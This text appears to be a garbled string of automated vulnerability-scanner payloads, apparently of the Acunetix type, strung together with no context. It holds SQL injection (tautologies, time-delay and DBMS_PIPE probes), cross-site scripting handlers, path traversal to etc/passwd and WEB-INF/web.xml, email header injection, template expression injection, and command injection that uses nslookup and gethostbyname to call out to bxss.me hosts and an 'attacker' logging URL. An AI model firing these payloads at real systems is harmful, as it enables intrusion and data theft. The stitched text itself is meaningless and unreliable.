".gethostbyname(lc("hithv"."kymvikzu512a1.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(85).chr(115).chr(71)." action.php/. 1"onmouseover=u0lw(94382)" PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9667'> 1<img sRc='http://attacker-9064/log.php? iexplode -1' OR 2+450-450-1=0+0+0+1 or '7Y3rBE3E'=' -1); waitfor delay '0:0:15' -- 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98) to@example.com> bcc:074625.4369-309279.4369.ccbee.20573.2@bxss.me WEB-INF\web.xml "&&sleep(27*1000)*zygeql&&" xfs.bxss.me 1" AMOa=u0lw([!+!]) ENl=" 1<body onload=u0lw(9057)> 1<aHtmMHJ< iexploder -1" OR 2+179-179-1=0+0+0+1 -- &nslookup -q=cname hitbigwcniepufb5ff.bxss.me&'\"`0&nslookup -q=cname hitbigwcniepufb5ff.bxss.me&`' 15)||' %2fetc%2fpasswd ${10000358+10000169} '||sleep(27*1000)*muqeew||' '" 1\u0022onmouseover=u0lw(93573)\u0022 1<img src=//xss.bxss.me/t/dot.gif onload=u0lw(9178)> fnfOzvSR iexplore if(now()=sysdate() 1 waitfor delay '0:0:15' --